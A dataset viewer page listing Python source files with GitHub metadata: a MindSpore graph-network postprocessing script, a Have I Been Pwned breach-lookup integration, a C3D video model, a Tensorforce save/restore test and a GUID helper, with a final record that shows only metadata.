Dataset Viewer

Schema of the records shown below (column name, dtype, and the observed range of values; ⌀ marks columns that may be null):

| Column | Dtype | Values |
|---|---|---|
| hexsha | string | lengths 40 to 40 |
| size | int64 | 6 to 782k |
| ext | string | 7 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 4 to 237 |
| max_stars_repo_name | string | lengths 6 to 72 |
| max_stars_repo_head_hexsha | string | lengths 40 to 40 |
| max_stars_repo_licenses | sequence | |
| max_stars_count | int64 ⌀ | 1 to 53k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | lengths 24 to 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | lengths 24 to 24 |
| max_issues_repo_path | string | lengths 4 to 184 |
| max_issues_repo_name | string | lengths 6 to 72 |
| max_issues_repo_head_hexsha | string | lengths 40 to 40 |
| max_issues_repo_licenses | sequence | |
| max_issues_count | int64 ⌀ | 1 to 27.1k |
| max_issues_repo_issues_event_min_datetime | string ⌀ | lengths 24 to 24 |
| max_issues_repo_issues_event_max_datetime | string ⌀ | lengths 24 to 24 |
| max_forks_repo_path | string | lengths 4 to 184 |
| max_forks_repo_name | string | lengths 6 to 72 |
| max_forks_repo_head_hexsha | string | lengths 40 to 40 |
| max_forks_repo_licenses | sequence | |
| max_forks_count | int64 ⌀ | 1 to 12.2k |
| max_forks_repo_forks_event_min_datetime | string ⌀ | lengths 24 to 24 |
| max_forks_repo_forks_event_max_datetime | string ⌀ | lengths 24 to 24 |
| content | string | lengths 6 to 782k |
| avg_line_length | float64 | 2.75 to 664k |
| max_line_length | int64 | 5 to 782k |
| alphanum_fraction | float64 | 0 to 1 |
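Each record below is rendered as its metadata fields, followed by the raw Python file stored in `content`, and closes with that file's derived `avg_line_length` / `max_line_length` / `alphanum_fraction` values. As a rough illustration of how a dataset with this schema could be loaded and inspected with the Hugging Face `datasets` library, here is a minimal sketch; the repository id `user/python-code-dataset` is a placeholder, not the actual dataset behind this viewer:

```python
from itertools import islice
from datasets import load_dataset

# Placeholder repository id -- substitute the dataset this viewer page belongs to.
ds = load_dataset("user/python-code-dataset", split="train", streaming=True)

# Each record carries GitHub metadata plus the raw source file in `content`.
for record in islice(iter(ds), 3):
    print(record["max_stars_repo_path"], record["size"], record["max_stars_count"])
    print(record["content"][:120])
```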
path: research/gnn/sgcn/postprocess.py | hexsha: 8a78745915eb3a4aaf90865a024b4d8bafd46ca7 | size: 5,151 | ext: py | lang: Python | licenses: ["Apache-2.0"]
max_stars_repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | stars: 1 (2021-11-18T08:17:44Z to 2021-11-18T08:17:44Z)
max_issues_repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | issues: null
max_forks_repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | forks: 2 (2019-09-01T06:17:04Z to 2019-10-04T08:39:45Z)

# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
postprocess.
"""
import os
import argparse
import numpy as np
from src.ms_utils import calculate_auc
from mindspore import context, load_checkpoint
def softmax(x):
t_max = np.max(x, axis=1, keepdims=True) # returns max of each row and keeps same dims
e_x = np.exp(x - t_max) # subtracts each row with its max value
t_sum = np.sum(e_x, axis=1, keepdims=True) # returns sum of each row and keeps same dims
f_x = e_x / t_sum
return f_x
def score_model(preds, test_pos, test_neg, weight, bias):
"""
Score the model on the test set edges in each epoch.
    Args:
        preds (numpy.ndarray): Node embeddings produced by the network.
        test_pos (list): Positive test edges.
        test_neg (list): Negative test edges.
        weight (numpy.ndarray): Regression weight matrix from the checkpoint.
        bias (numpy.ndarray): Regression bias vector from the checkpoint.
Returns:
auc(Float32): AUC result.
f1(Float32): F1-Score result.
"""
score_positive_edges = np.array(test_pos, dtype=np.int32).T
score_negative_edges = np.array(test_neg, dtype=np.int32).T
test_positive_z = np.concatenate((preds[score_positive_edges[0, :], :],
preds[score_positive_edges[1, :], :]), axis=1)
test_negative_z = np.concatenate((preds[score_negative_edges[0, :], :],
preds[score_negative_edges[1, :], :]), axis=1)
# operands could not be broadcast together with shapes (4288,128) (128,3)
scores = np.dot(np.concatenate((test_positive_z, test_negative_z), axis=0), weight) + bias
probability_scores = np.exp(softmax(scores))
predictions = probability_scores[:, 0]/probability_scores[:, 0:2].sum(1)
# predictions = predictions.asnumpy()
targets = [0]*len(test_pos) + [1]*len(test_neg)
auc, f1 = calculate_auc(targets, predictions)
return auc, f1
def get_acc():
"""get infer Accuracy."""
parser = argparse.ArgumentParser(description='postprocess')
parser.add_argument('--dataset_name', type=str, default='bitcoin-otc', choices=['bitcoin-otc', 'bitcoin-alpha'],
help='dataset name')
parser.add_argument('--result_path', type=str, default='./ascend310_infer/input/', help='result Files')
parser.add_argument('--label_path', type=str, default='', help='y_test npy Files')
parser.add_argument('--mask_path', type=str, default='', help='test_mask npy Files')
parser.add_argument("--checkpoint_file", type=str, default='sgcn_alpha_f1.ckpt', help="Checkpoint file path.")
parser.add_argument("--edge_path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--features-path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--test-size", type=float,
default=0.2, help="Test dataset size. Default is 0.2.")
parser.add_argument("--seed", type=int, default=42,
help="Random seed for sklearn pre-training. Default is 42.")
parser.add_argument("--spectral-features", default=True, dest="spectral_features", action="store_true")
parser.add_argument("--reduction-iterations", type=int,
default=30, help="Number of SVD iterations. Default is 30.")
parser.add_argument("--reduction-dimensions", type=int,
default=64, help="Number of SVD feature extraction dimensions. Default is 64.")
args_opt = parser.parse_args()
# Runtime
context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=0)
# Create network
test_pos = np.load(os.path.join(args_opt.result_path, 'pos_test.npy'))
test_neg = np.load(os.path.join(args_opt.result_path, 'neg_test.npy'))
# Load parameters from checkpoint into network
param_dict = load_checkpoint(args_opt.checkpoint_file)
print(type(param_dict))
print(param_dict)
print(type(param_dict['regression_weights']))
print(param_dict['regression_weights'])
# load_param_into_net(net, param_dict)
pred = np.fromfile('./result_Files/repos_0.bin', np.float32)
if args_opt.dataset_name == 'bitcoin-otc':
pred = pred.reshape(5881, 64)
else:
pred = pred.reshape(3783, 64)
auc, f1 = score_model(pred, test_pos, test_neg, param_dict['regression_weights'].asnumpy(),
param_dict['regression_bias'].asnumpy())
print("Test set results:", "auc=", "{:.5f}".format(auc), "f1=", "{:.5f}".format(f1))
if __name__ == '__main__':
get_acc()
avg_line_length: 48.140187 | max_line_length: 117 | alphanum_fraction: 0.644729

path: Packs/Pwned/Integrations/PwnedV2/PwnedV2.py | hexsha: 0a10152195fb9a20741a86fb44035860fed300f4 | size: 12,017 | ext: py | lang: Python | licenses: ["MIT"]
max_stars_repo: diCagri/content @ c532c50b213e6dddb8ae6a378d6d09198e08fc9f | stars: 799 (2016-08-02T06:43:14Z to 2022-03-31T11:10:11Z)
max_issues_repo: diCagri/content @ c532c50b213e6dddb8ae6a378d6d09198e08fc9f | issues: 9,317 (2016-08-07T19:00:51Z to 2022-03-31T21:56:04Z)
max_forks_repo: diCagri/content @ c532c50b213e6dddb8ae6a378d6d09198e08fc9f | forks: 1,297 (2016-08-04T13:59:00Z to 2022-03-31T23:43:06Z)

from CommonServerPython import *
''' IMPORTS '''
import re
import requests
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBALS/PARAMS '''
VENDOR = 'Have I Been Pwned? V2'
MAX_RETRY_ALLOWED = demisto.params().get('max_retry_time', -1)
API_KEY = demisto.params().get('api_key')
USE_SSL = not demisto.params().get('insecure', False)
BASE_URL = 'https://haveibeenpwned.com/api/v3'
HEADERS = {
'hibp-api-key': API_KEY,
'user-agent': 'DBOT-API',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
DEFAULT_DBOT_SCORE_EMAIL = 2 if demisto.params().get('default_dbot_score_email') == 'SUSPICIOUS' else 3
DEFAULT_DBOT_SCORE_DOMAIN = 2 if demisto.params().get('default_dbot_score_domain') == 'SUSPICIOUS' else 3
SUFFIXES = {
"email": '/breachedaccount/',
"domain": '/breaches?domain=',
"username": '/breachedaccount/',
"paste": '/pasteaccount/',
"email_truncate_verified": '?truncateResponse=false&includeUnverified=true',
"domain_truncate_verified": '&truncateResponse=false&includeUnverified=true',
"username_truncate_verified": '?truncateResponse=false&includeUnverified=true'
}
RETRIES_END_TIME = datetime.min
''' HELPER FUNCTIONS '''
def http_request(method, url_suffix, params=None, data=None):
while True:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
params=params,
data=data,
headers=HEADERS
)
if res.status_code != 429:
# Rate limit response code
break
if datetime.now() > RETRIES_END_TIME:
return_error('Max retry time has exceeded.')
wait_regex = re.search(r'\d+', res.json()['message'])
if wait_regex:
wait_amount = wait_regex.group()
else:
demisto.error('failed extracting wait time will use default (5). Res body: {}'.format(res.text))
wait_amount = 5
if datetime.now() + timedelta(seconds=int(wait_amount)) > RETRIES_END_TIME:
return_error('Max retry time has exceeded.')
time.sleep(int(wait_amount))
if res.status_code == 404:
return None
if not res.status_code == 200:
if not res.status_code == 401:
demisto.error(
'Error in API call to Pwned Integration [%d]. Full text: %s' % (res.status_code, res.text))
return_error('Error in API call to Pwned Integration [%d] - %s' % (res.status_code, res.reason))
return None
return res.json()
def html_description_to_human_readable(breach_description):
"""
Converting from html description to hr
:param breach_description: Description of breach from API response
:return: Description string that altered HTML urls to clickable urls
for better readability in war-room
"""
html_link_pattern = re.compile('<a href="(.+?)"(.+?)>(.+?)</a>')
patterns_found = html_link_pattern.findall(breach_description)
for link in patterns_found:
html_actual_address = link[0]
html_readable_name = link[2]
link_from_desc = '[' + html_readable_name + ']' + '(' + html_actual_address + ')'
breach_description = re.sub(html_link_pattern, link_from_desc, breach_description, count=1)
return breach_description
def data_to_markdown(query_type, query_arg, api_res, api_paste_res=None):
records_found = False
md = '### Have I Been Pwned query for ' + query_type.lower() + ': *' + query_arg + '*\n'
if api_res:
records_found = True
for breach in api_res:
verified_breach = 'Verified' if breach['IsVerified'] else 'Unverified'
md += '#### ' + breach['Title'] + ' (' + breach['Domain'] + '): ' + str(breach['PwnCount']) + \
' records breached [' + verified_breach + ' breach]\n'
md += 'Date: **' + breach['BreachDate'] + '**\n\n'
md += html_description_to_human_readable(breach['Description']) + '\n'
md += 'Data breached: **' + ','.join(breach['DataClasses']) + '**\n'
if api_paste_res:
records_found = True
pastes_list = []
for paste_breach in api_paste_res:
paste_entry = \
{
'Source': paste_breach['Source'],
'Title': paste_breach['Title'],
'ID': paste_breach['Id'],
'Date': '',
'Amount of emails in paste': str(paste_breach['EmailCount'])
}
if paste_breach['Date']:
paste_entry['Date'] = paste_breach['Date'].split('T')[0]
pastes_list.append(paste_entry)
md += tableToMarkdown('The email address was found in the following "Pastes":',
pastes_list,
['ID', 'Title', 'Date', 'Source', 'Amount of emails in paste'])
if not records_found:
md += 'No records found'
return md
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': VENDOR,
'Score': dbot_score
}
def create_context_entry(context_type, context_main_value, comp_sites, comp_pastes, malicious_score):
context_dict = dict() # dict
if context_type == 'email':
context_dict['Address'] = context_main_value
else:
context_dict['Name'] = context_main_value
context_dict['Pwned-V2'] = {
'Compromised': {
'Vendor': VENDOR,
'Reporters': ', '.join(comp_sites + comp_pastes)
}
}
if malicious_score == 3:
context_dict['Malicious'] = add_malicious_to_context(context_type)
return context_dict
def add_malicious_to_context(malicious_type):
return {
'Vendor': VENDOR,
'Description': 'The ' + malicious_type + ' has been compromised'
}
def email_to_entry_context(email, api_email_res, api_paste_res):
dbot_score = 0
comp_email = dict() # type: dict
comp_sites = sorted([item['Title'] for item in api_email_res])
comp_pastes = sorted(set(item['Source'] for item in api_paste_res))
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_EMAIL
email_context = create_context_entry('email', email, comp_sites, comp_pastes, DEFAULT_DBOT_SCORE_EMAIL)
comp_email[outputPaths['email']] = email_context
comp_email['DBotScore'] = create_dbot_score_dictionary(email, 'email', dbot_score)
return comp_email
def domain_to_entry_context(domain, api_res):
comp_sites = [item['Title'] for item in api_res]
comp_sites = sorted(comp_sites)
comp_domain = dict() # type: dict
dbot_score = 0
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_DOMAIN
domain_context = create_context_entry('domain', domain, comp_sites, [], DEFAULT_DBOT_SCORE_DOMAIN)
comp_domain[outputPaths['domain']] = domain_context
comp_domain['DBotScore'] = create_dbot_score_dictionary(domain, 'domain', dbot_score)
return comp_domain
def set_retry_end_time():
global RETRIES_END_TIME
if MAX_RETRY_ALLOWED != -1:
RETRIES_END_TIME = datetime.now() + timedelta(seconds=int(MAX_RETRY_ALLOWED))
''' COMMANDS + REQUESTS FUNCTIONS '''
def test_module(args_dict):
"""
If the http request was successful the test will return OK
:return: 3 arrays of outputs
"""
http_request('GET', SUFFIXES.get("username", '') + 'test')
return ['ok'], [None], [None]
def pwned_email_command(args_dict):
"""
Executing the pwned request for emails list, in order to support list input, the function returns 3 lists of outputs
:param args_dict: the demisto argument - in this case the email list is needed
:return: 3 arrays of outputs
"""
email_list = argToList(args_dict.get('email', ''))
api_email_res_list, api_paste_res_list = pwned_email(email_list)
md_list = []
ec_list = []
for email, api_email_res, api_paste_res in zip(email_list, api_email_res_list, api_paste_res_list):
md_list.append(data_to_markdown('Email', email, api_email_res, api_paste_res))
ec_list.append(email_to_entry_context(email, api_email_res or [], api_paste_res or []))
return md_list, ec_list, api_email_res_list
def pwned_email(email_list):
"""
Executing the http requests
:param email_list: the email list that needed for the http requests
:return: 2 arrays of http requests outputs
"""
api_email_res_list = []
api_paste_res_list = []
for email in email_list:
email_suffix = SUFFIXES.get("email") + email + SUFFIXES.get("email_truncate_verified")
paste_suffix = SUFFIXES.get("paste") + email
api_email_res_list.append(http_request('GET', url_suffix=email_suffix))
api_paste_res_list.append(http_request('GET', url_suffix=paste_suffix))
return api_email_res_list, api_paste_res_list
def pwned_domain_command(args_dict):
"""
Executing the pwned request for domains list, in order to support list input, the function returns 3 lists of
outputs
:param args_dict: the demisto argument - in this case the domain list is needed
:return: 3 arrays of outputs
"""
domain_list = argToList(args_dict.get('domain', ''))
api_res_list = pwned_domain(domain_list)
md_list = []
ec_list = []
for domain, api_res in zip(domain_list, api_res_list):
md_list.append(data_to_markdown('Domain', domain, api_res))
ec_list.append(domain_to_entry_context(domain, api_res or []))
return md_list, ec_list, api_res_list
def pwned_domain(domain_list):
"""
Executing the http request
:param domain_list: the domains list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for domain in domain_list:
suffix = SUFFIXES.get("domain") + domain + SUFFIXES.get("domain_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
def pwned_username_command(args_dict):
"""
Executing the pwned request for usernames list, in order to support list input, the function returns 3 lists of
outputs
:param args_dict: the demisto argument - in this case the username list is needed
:return: 3 arrays of outputs
"""
username_list = argToList(args_dict.get('username', ''))
api_res_list = pwned_username(username_list)
md_list = []
ec_list = []
for username, api_res in zip(username_list, api_res_list):
md_list.append(data_to_markdown('Username', username, api_res))
ec_list.append(domain_to_entry_context(username, api_res or []))
return md_list, ec_list, api_res_list
def pwned_username(username_list):
"""
Executing the http request
:param username_list: the username list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for username in username_list:
suffix = SUFFIXES.get("username") + username + SUFFIXES.get("username_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
command = demisto.command()
LOG('Command being called is: {}'.format(command))
try:
handle_proxy()
set_retry_end_time()
commands = {
'test-module': test_module,
'email': pwned_email_command,
'pwned-email': pwned_email_command,
'domain': pwned_domain_command,
'pwned-domain': pwned_domain_command,
'pwned-username': pwned_username_command
}
if command in commands:
md_list, ec_list, api_email_res_list = commands[command](demisto.args())
for md, ec, api_paste_res in zip(md_list, ec_list, api_email_res_list):
return_outputs(md, ec, api_paste_res)
# Log exceptions
except Exception as e:
return_error(str(e))
avg_line_length: 34.042493 | max_line_length: 120 | alphanum_fraction: 0.659732

path: official/cv/c3d/src/c3d_model.py | hexsha: 0a8fdb2b5cc10e441111eda628478417245011ef | size: 5,283 | ext: py | lang: Python | licenses: ["Apache-2.0"]
max_stars_repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | stars: 77 (2021-10-15T08:32:37Z to 2022-03-30T13:09:11Z)
max_issues_repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | issues: 3 (2021-10-30T14:44:57Z to 2022-02-14T06:57:57Z)
max_forks_repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | forks: 24 (2021-10-15T08:32:45Z to 2022-03-24T18:45:20Z)

# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import math
import mindspore.nn as nn
import mindspore.ops as P
from mindspore.common import initializer as init
from src.utils import default_recurisive_init, KaimingNormal
class C3D(nn.Cell):
"""
C3D network definition.
Args:
num_classes (int): Class numbers. Default: 1000.
Returns:
Tensor, infer output tensor.
Examples:
>>> C3D(num_classes=1000)
"""
def __init__(self, num_classes=1000):
super(C3D, self).__init__()
self.conv1 = nn.Conv3d(in_channels=3, out_channels=64, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool1 = P.MaxPool3D(kernel_size=(1, 2, 2), strides=(1, 2, 2), pad_mode='same')
self.conv2 = nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool2 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv3a = nn.Conv3d(in_channels=128, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv3b = nn.Conv3d(in_channels=256, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool3 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv4a = nn.Conv3d(in_channels=256, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv4b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool4 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv5a = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv5b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool5 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.fc6 = nn.Dense(in_channels=8192, out_channels=4096)
self.fc7 = nn.Dense(in_channels=4096, out_channels=4096)
self.fc8 = nn.Dense(in_channels=4096, out_channels=num_classes, bias_init=init.Normal(0.02))
self.dropout = nn.Dropout(keep_prob=0.5)
self.relu = nn.ReLU()
self.pad = nn.Pad(paddings=((0, 0), (0, 0), (1, 0), (1, 0)), mode="CONSTANT")
self.__init_weight()
def __init_weight(self):
default_recurisive_init(self)
self.custom_init_weight()
def construct(self, x):
x = self.relu(self.conv1(x))
x = self.pool1(x)
x = self.relu(self.conv2(x))
x = self.pool2(x)
x = self.relu(self.conv3a(x))
x = self.relu(self.conv3b(x))
x = self.pool3(x)
x = self.relu(self.conv4a(x))
x = self.relu(self.conv4b(x))
x = self.pool4(x)
x = self.relu(self.conv5a(x))
x = self.relu(self.conv5b(x))
x = x.view(-1, 512 * 2, 7, 7)
x = self.pad(x)
x = x.view(-1, 512, 2, 8, 8)
x = self.pool5(x)
x = x.view(-1, 8192)
x = self.relu(self.fc6(x))
x = self.dropout(x)
x = self.relu(self.fc7(x))
x = self.dropout(x)
logits = self.fc8(x)
return logits
def custom_init_weight(self):
"""
Init the weight of Conv3d and Dense in the net.
"""
for _, cell in self.cells_and_names():
if isinstance(cell, nn.Conv3d):
cell.weight.set_data(init.initializer(
KaimingNormal(a=math.sqrt(5), mode='fan_out', nonlinearity='relu'),
cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
elif isinstance(cell, nn.Dense):
cell.weight.set_data(init.initializer(
init.Normal(0.01), cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
avg_line_length: 40.638462 | max_line_length: 100 | alphanum_fraction: 0.570509

path: tensorforce/tests/test_model_save_restore.py | hexsha: 7c2f595fee4e21dc84c6666b03b2174e6d5731e0 | size: 8,108 | ext: py | lang: Python | licenses: ["Apache-2.0"]
max_stars_repo: gian1312/suchen @ df863140fd8df1ac2e195cbdfa4756f09f962270 | stars: null
max_issues_repo: gian1312/suchen @ df863140fd8df1ac2e195cbdfa4756f09f962270 | issues: null
max_forks_repo: gian1312/suchen @ df863140fd8df1ac2e195cbdfa4756f09f962270 | forks: 1 (2019-11-29T12:28:33Z to 2019-11-29T12:28:33Z)

from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import unittest
import pytest
from tensorforce import TensorForceError
from tensorforce.core.networks import LayeredNetwork
from tensorforce.models import DistributionModel
from tensorforce.tests.minimal_test import MinimalTest
from tensorforce.agents import PPOAgent
from tensorforce.execution import Runner
import tensorflow as tf
import numpy as np
from tensorforce.util import SavableComponent
import os
class SavableNetwork(LayeredNetwork, SavableComponent):
"""
Minimal implementation of a Network that can be saved and restored independently of the Model.
"""
def get_savable_variables(self):
return super(SavableNetwork, self).get_variables(include_nontrainable=False)
def _get_base_variable_scope(self):
return self.apply.variable_scope_name
def create_environment(spec):
return MinimalTest(spec)
def create_agent(environment, network_spec):
return PPOAgent(
update_mode=dict(
unit='episodes',
batch_size=4,
frequency=4
),
memory=dict(
type='latest',
include_next_states=False,
capacity=100
),
step_optimizer=dict(
type='adam',
learning_rate=1e-3
),
subsampling_fraction=0.3,
optimization_steps=20,
states=environment.states,
actions=environment.actions,
network=network_spec
)
class TestModelSaveRestore(unittest.TestCase):
@pytest.fixture(autouse=True)
def initdir(self, tmpdir):
tmpdir.chdir()
self._tmp_dir_path = str(tmpdir)
print("Using %s" % (self._tmp_dir_path, ))
def test_save_restore(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [
dict(type='dense', size=32)
]
agent = create_agent(environment, network_spec)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
save_path = agent.model.save(directory=self._tmp_dir_path + "/model")
print("Saved at: %s" % (save_path,))
runner.close()
agent = create_agent(environment, network_spec)
agent.model.restore(directory="", file=save_path)
restored_model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
assert len(model_values) == len(restored_model_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(model_values, restored_model_values)])
agent.close()
def test_save_network(self):
"""
Test to validate that calls to save and restore of a SavableComponent successfully save and restore the
component's state.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=1)]
)
agent = create_agent(environment, network_spec)
assert isinstance(agent.model.network, SavableComponent)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
network_values = agent.model.session.run(agent.model.network.get_variables())
distribution = next(iter(agent.model.distributions.values()))
distribution_values = agent.model.session.run(distribution.get_variables())
save_path = self._tmp_dir_path + "/network"
agent.model.save_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
runner.close()
assert os.path.isfile(save_path + ".data-00000-of-00001")
assert os.path.isfile(save_path + ".index")
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
# Ensure only the network variables are loaded
restored_network_values = agent.model.session.run(agent.model.network.get_variables(include_nontrainable=True))
distribution = next(iter(agent.model.distributions.values()))
restored_distribution_values = agent.model.session.run(distribution.get_variables())
assert len(restored_network_values) == len(network_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(network_values, restored_network_values)])
assert len(restored_distribution_values) == len(distribution_values)
assert not all([np.array_equal(v1, v2) for v1, v2 in zip(distribution_values, restored_distribution_values)])
agent.close()
environment.close()
def test_pretrain_network(self):
"""
Simulates training outside of Tensorforce and then loading the parameters in the agent's network.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
size = environment.states["shape"]
output_size = 1
save_path = self._tmp_dir_path + "/network"
g = tf.Graph()
with g.as_default():
x = tf.placeholder(dtype=environment.states["type"], shape=[None, size])
layer = tf.layers.Dense(units=output_size)
y = layer(x)
y_ = tf.placeholder(dtype=environment.states["type"], shape=[None, output_size])
loss = tf.losses.mean_squared_error(y_, y)
optimizer = tf.train.AdamOptimizer(learning_rate=0.1)
train_step = optimizer.minimize(loss)
batch_size = 64
with tf.Session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(100):
batch = np.random.random([batch_size, size])
correct = np.ones(shape=[batch.shape[0], output_size])
loss_value, _ = sess.run([loss, train_step], {x: batch, y_: correct})
if epoch % 10 == 0:
print("epoch %d: %f" % (epoch, loss_value))
var_map = {
"dense0/apply/linear/apply/W:0": layer.kernel,
"dense0/apply/linear/apply/b:0": layer.bias
}
saver = tf.train.Saver(var_list=var_map)
saver.save(sess=sess, write_meta_graph=False, save_path=save_path)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=output_size)],
)
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=agent.model.COMPONENT_NETWORK, save_path=save_path)
agent.close()
def test_non_savable_component(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [dict(type='dense', size=32)]
agent = create_agent(environment, network_spec)
expected_message = "Component network must implement SavableComponent but is "
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.save_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="non-existent", save_path=self._tmp_dir_path + "/network")
assert "Component non-existent must implement SavableComponent but is None" == str(excinfo.value)
agent.close()
avg_line_length: 39.940887 | max_line_length: 119 | alphanum_fraction: 0.662309

path: guid.py | hexsha: 7c2f74f5570ad8ece2d2a501cd63b62951484c2c | size: 844 | ext: py | lang: Python | licenses: ["Apache-2.0"]
max_stars_repo: lihuiba/SoftSAN @ 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | stars: 1 (2015-08-02T09:53:18Z to 2015-08-02T09:53:18Z)
max_issues_repo: lihuiba/SoftSAN @ 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | issues: null
max_forks_repo: lihuiba/SoftSAN @ 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | forks: 2 (2018-03-21T04:59:50Z to 2019-12-03T15:54:17Z)

import random
import messages_pb2 as msg
def assign(x, y):
x.a=y.a; x.b=y.b; x.c=y.c; x.d=y.d
def isZero(x):
return (x.a==0 and x.b==0 and x.c==0 and x.d==0)
def setZero(x):
x.a=0; x.b=0; x.c=0; x.d=0
def toStr(x):
return "%08x-%08x-%08x-%08x" % (x.a, x.b, x.c, x.d)
def toTuple(x):
return (x.a, x.b, x.c, x.d)
def fromTuple(x):
ret=msg.Guid()
ret.a=x[0]
ret.b=x[1]
ret.c=x[2]
ret.d=x[3]
return ret
def generate(guid=None):
ret=guid or msg.Guid()
ret.a=random.randint(0, 0xffffffff)
ret.b=random.randint(0, 0xffffffff)
ret.c=random.randint(0, 0xffffffff)
ret.d=random.randint(0, 0xffffffff)
return ret
def fromStr(s):
ret=msg.Guid()
s=s.split('-')
ret.a=int(s[0], 16)
ret.b=int(s[1], 16)
ret.c=int(s[2], 16)
ret.d=int(s[3], 16)
return ret
avg_line_length: 19.181818 | max_line_length: 55 | alphanum_fraction: 0.562796

path: oneflow/python/test/ops/test_l1loss.py | hexsha: 861c79331c252b7937573a42f8e033c57c978cd9 | size: 6,138 | ext: py | lang: Python | licenses: ["Apache-2.0"]
